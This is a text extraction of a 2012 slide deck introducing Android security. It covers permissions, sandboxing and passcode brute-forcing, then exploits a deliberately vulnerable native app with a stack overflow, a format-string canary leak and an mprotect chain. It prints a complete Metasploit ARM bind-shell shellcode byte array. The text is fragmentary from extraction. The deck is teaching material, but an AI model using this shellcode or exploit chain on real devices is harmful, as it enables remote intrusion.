Professional Documents
Culture Documents
Android Security
An Introduction Antonio Barresi
Software Engineer
Pter Somogyvri
Software Engineer 13th October 2012
About us
Antonio Barresi Software Engineer Pter Somogyvri Software Engineer
Outline
1.! Android Security Basics
1.! Smartphones, Mobile Security & Android 2.! The Android Platform 3.! Android Device & Data Security
Mobile Security
Base Station
WiFi
Thief
BlueTooth, NFC
Physical Threats
M alware
App Markets
Data on Smartphones
! ! ! ! ! ! ! ! Emails/SMS Contacts Pictures GPS data Google searches & Web history Documents Account information & Passwords Banking data (not persistent)
Android Architecture
What is an App?
.apk Android Package Name of the package Describes components of the App Required permissions Minimum level of API Dalvik Bytecode (all classes in one file) MANIFEST.MF: Hashes of all files. CERT.SF: Hash of MANIFEST.MF and hashes of all the entries in MANIFEST.MF. CERT.RSA: Signature of CERT.SF file including the signer's certificate (public key) itself.
9
App Installation
! .apk Packages are self signed!
! Its not about the trustworthiness of the developer!
10
! Within the process a Dalvik VM instance is running ! Most Apps are just Java based
! Or they are Web-based running within WebKit
11
Kernel
12
Android Permissions
! Defined within AndroidManifest.xml
13
Android Permissions
! Require permissions to interact with App
14
Android Sandbox
! Sandboxing is implemented by the Android Permission Model and Linux User separation
! Processes are separated by different UIDs ! Filesystem Access is authorized by File Permissions ! Android API calls are authorized according to the Android permissions e.g. access to Contacts, SMS, Location... ! Network, SD Card or Bluetooth access is authorized by Linux Group Membership
15
16
17
http://xkcd.com/538/
18
Device protection
! Screen lock with PIN, passcode, pattern or face recognition
! Bootloader is locked by default (in most cases) ! Can not run adb as root on a physical device by default (in most cases)
https://android.googlesource.com/platform/frameworks/base/+/master/policy/src/com/android/internal/policy/impl/LockScreen.java
19
Passcode Protection
20
Passcode Protection
! Hashed Passcode/PIN is stored in: /data/system/password.key
21
Brute-Force Passcode
! Get the hash and the salt
! Brute-Force it!
22
Brute-Force Passcode
Length in chars Crack time 4 ~1m 5 ~1,5h 6 ~3,5d 7 ~219d 8 ~37y 9 ~2306y
! Results by a mobile i7 2630QM ! Single threaded code ! 6,7,8,9 are estimated by 4 and 5 ! Use GT 525M and some CUDA magic? ! What about Rainbow Tables?
23
Boot Process
Init Process
24
Rooting
! By default there is no way to execute apps as root ! Rooting: find a way to run apps/processes as root!
! E.g. install a su binary
25
Storage Encryption
! Available since version 3.0 HoneyComb
! Uses dm-crypt which is provided by the Linux kernel
! Key stored on the storage ! Attack: dump the entire storage and bruteforce offline!
26
Attack Paths
Physical Access
By Software
ADB enabled?
Bootloader unlocked?
Hardware techniques?
Is storage encrypted?
27
Conclusion
! Passcode should be used
! As complex as possible, as usual ;) ! But it does not offer full protection!
28
29
Software Security
30
! Can be potentially exploited by an attacker to run arbitrary code in the context of the process e.g. remotely ! The Morris Worm exploited a Memory Corruption Vulnerability in 1988 (one of the first Internet Worms)
31
Full ASLR* !
And some additional protections, see Android Security Overview for more details.
Android Security Overview: http://source.android.com/tech/security/
32
A VulnerableNativeApp
33
A VulnerableNativeApp In Action
Gangnam style!
Gangnam style!
34
VulnerableNativeApp Vulnerabilities
35
RETURN_ADDRESS LOCAL_POINTER
grows towards lower addresses
OVERFLOWED RET_ADDR
OVERFLOWED LOC_PTR
LOCAL_VARIABLE
OVERFLOWED LOC_VAR
LOCAL_BUFFER
LOCAL_VARIABLE
LOCAL_VARIABLE
0x00000000
36
VulnerableNativeApp Vulnerabilities
Use it to hijack control flow! buf is under user control and we can therefore use our own format string!
38
39
! Instruction Sets
! ARM, Thumb and Jazelle Instruction Set ! ARM uses 32 bit opcodes, Thumb 16 bit opcodes ! Execute Thumb instructions by a branch to <address>+1
push movs {r4, lr} r0, #4 bl add 0x80b01b88 r3, sp, #36
ldr str
40
41
VulnerableNativeApp Vulnerabilities
42
The Plan
Process Stack of readFromSocket before Overflow
init_server() stack
LR (RET_ADDRESS) R4 n=0 read(fd, recvBuff, 1024);
ADDRESS OF SHELLCODE
OVERFLOWED R4 OVERFLOWED n
Function enter:
0x80b01b88 <+0>: 0x80b01b8a <+2>: 0x80b01b8c <+4>: push ldr add {r4, lr} r4, [pc, #120] sp, r4
Function leave:
0x80b01bfe <+118>: 0x80b01c00 <+120>: 0x80b01c02 <+122>: lsls add pop r3, r3, #2 sp, r3 {r4, pc}
43
Stack Protection
Process Stack of readFromSocket before Overflow Process Stack of readFromSocket after Overflow
ADDRESS OF SHELLCODE
OVERFLOWED R4
OVERFLOWED GUARD
OVERFLOWED n
r2, r3 0x80b01bfc <readFromSocket+116> 0x80b01974 r3, #132 ; 0x84 r3, r3, #2 sp, r3 {r4, pc}
44
Stack Protection
logcat:! ...! I/VulnerableNativeApp( 630): VulnerableNativeApp: input read: AAAAAAAAAA! F//system/bin/app_process( 630): stack corruption detected: aborted! I/ActivityManager( 162): Process com.example.VulnerableNativeApp (pid 630) has died.! ...!
45
RANDOM GUARD
echo stack()
46
47
ADDRESS OF SHELLCODE
0x80b01c02 <+122>:
pop
{r4, pc}
48
Non-Executable Stack
Process Stack of readFromSocket before Overflow Process Stack of readFromSocket after Overflow
ADDRESS OF SHELLCODE
stack is nonexecutable!
00000000 00020000 00000000 00001000 00000000 00040000 00000000 00001000 00009000 00000000 00000000
8a:0c 8a:0c 8a:0c 8a:0c 8a:0c 8a:0c 00:00 8a:0c 8a:0c 00:00 00:00
50
! mprotect is a system call and there is no restriction in the Android Linux Kernel for mprotect so far! ! Our new plan: lets call mprotect within libc to make the stack executable and lets then execute our shellcode!
51
53
54
sp = new stack pointer R6 = some value R2 = 7 (rwx) R1 = 1024 R0 = addr of stack some value ADDRESS ldmibvc -> pc
leaked by format string vuln leaked too predictable as no ASLR predictable as no ASLR
{r4, pc} {r4, r7} r7, #125 0x00000000 {r4, r7} r0, r0 lr
mprotect (r0,r1,r2)
sp = new stack pointer R6 = some value R2 = 7 (rwx) R1 = 1024 R0 = addr of stack some value ADDRESS ldmibvc -> pc
And mprotect() will return to our shellcode too! What a nice function! :)
56
The Shellcode
! We did not talk about shellcodes ! Just use msfpayload ! linux/armle/shell_bind_tcp ! Or write your own ARM assembly with arm-linux-gnueabi-as
$ msfpayload linux/armle/shell_bind_tcp C /* * linux/armle/shell_bind_tcp - 232 bytes * http://www.metasploit.com * VERBOSE=false, LPORT=4444, RHOST=, PrependSetresuid=false, * PrependSetreuid=false, PrependSetuid=false, * PrependChrootBreak=false, AppendExit=false, * InitialAutoRunScript=, AutoRunScript=, SHELL=/system/bin/sh, * SHELLARG=-C */ unsigned char buf[] = "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x01\x70\xa0" "\xe3\x07\x74\xa0\xe1\x19\x70\x87\xe2\x00\x00\x00\xef\x00\x60" "\xa0\xe1\xa4\x10\x8f\xe2\x10\x20\xa0\xe3\x01\x70\xa0\xe3\x07" "\x74\xa0\xe1\x1a\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1" "\x01\x70\xa0\xe3\x07\x74\xa0\xe1\x1c\x70\x87\xe2\x00\x00\x00" "\xef\x06\x00\xa0\xe1\x01\x10\x41\xe0\x02\x20\x42\xe0\x01\x70" "\xa0\xe3\x07\x74\xa0\xe1\x1d\x70\x87\xe2\x00\x00\x00\xef\x00" "\x60\xa0\xe1\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x70\xa0\xe3" "\x00\x00\x00\xef\x01\x10\x51\xe2\xfa\xff\xff\x5a\x48\x00\x8f" "\xe2\x04\x40\x24\xe0\x10\x00\x2d\xe9\x0d\x20\xa0\xe1\x04\x00" "\x2d\xe9\x0d\x20\xa0\xe1\x10\x00\x2d\xe9\x48\x10\x9f\xe5\x02" "\x00\x2d\xe9\x00\x20\x2d\xe9\x0d\x10\xa0\xe1\x04\x00\x2d\xe9" "\x0d\x20\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0" "\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x02\x00\x11\x5c\x00\x00" "\x00\x00\x2f\x73\x79\x73\x74\x65\x6d\x2f\x62\x69\x6e\x2f\x73" "\x68\x00\x00\x2d\x43\x00\x00"; $
57
58
ASLR compared
RUNS stack rw-p
beeb7000
libc r-xp
afd00000 afd00000 40087000 400ac000 4005e000 4009d000
linker r-xp
b0001000 b0001000 b0001000 b0001000 400fc000 4012a000
app_process r-xp
00008000 00008000 00008000 00008000 4005a000 4005e000
59
?
RANDOM GUARD is leaked through the format string vulnerability What about some pointer to libc?
RANDOM GUARD
echo stack()
60
61
Thank you!
Questions?
62